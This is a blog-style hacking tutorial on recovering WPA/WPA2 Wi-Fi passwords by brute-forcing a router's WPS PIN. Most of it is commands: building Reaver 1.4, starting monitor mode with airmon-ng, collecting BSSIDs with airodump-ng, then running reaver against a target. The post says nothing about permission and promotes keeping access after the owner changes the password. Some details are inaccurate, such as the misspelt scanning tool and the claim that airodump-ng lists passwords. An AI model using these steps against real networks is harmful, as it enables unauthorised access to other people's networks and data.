In this hacking tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS; Which is Wireless Protected Setup : this type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router's PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as:
You can always have the Wireless Password even if It's changed by knowing the PIN number.
How to Hack WEP Passwords
How To Hack WPA/WPA2 Passwords using Ubuntu (Reaver)
Step 1 (Setting up Reaver 1.4 )
0) Open terminal and type: sudo -s and type your password.1) Download (Better Download the Latest Version 1.4) Placed in a specified folder.
2) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
3) Install dependencies: sudo apt-get install libpcap-dev
then : sudo apt-get install libsqlite3-dev
Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are important.
4) Enter the folder by typing : cd reaver-1.4/src
5) Type: ./configure
6) Type : make
7) Type : make install
Step 2 ( Hacking WPA/WPA2 Wireless)
After
installing reaver 1.4, it's time to proceed to the main part which is
hacking wireless passwords that uses WPA/WPA2 Encryption.
Requirements:
Airodump-ng / Airmon-ng commands (You have to install aircrack: you can find how to HERE)
Reaver 1.4 (Install in Step 1)
1) We need to have the wireless BSSID (Mac address) so we use airodump-ng :
Open a terminal and Type : Airmon-ng start wlan0
Type : airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:22:33:44:55 )
2) Starting the attack:
Type: reaver -i mon0 -b 00:11:22:33:44:55
Now it will start testing
bruteforcing the PIN number of the vulnerability WPS (which we have
spoke about it), and it will show you the WPA/WPA2 Password in the end
of the Crack.
Note: You can use walsh -i mon0 to scan for vulnerable Access Points
Screenshot:
0 comments:
Post a Comment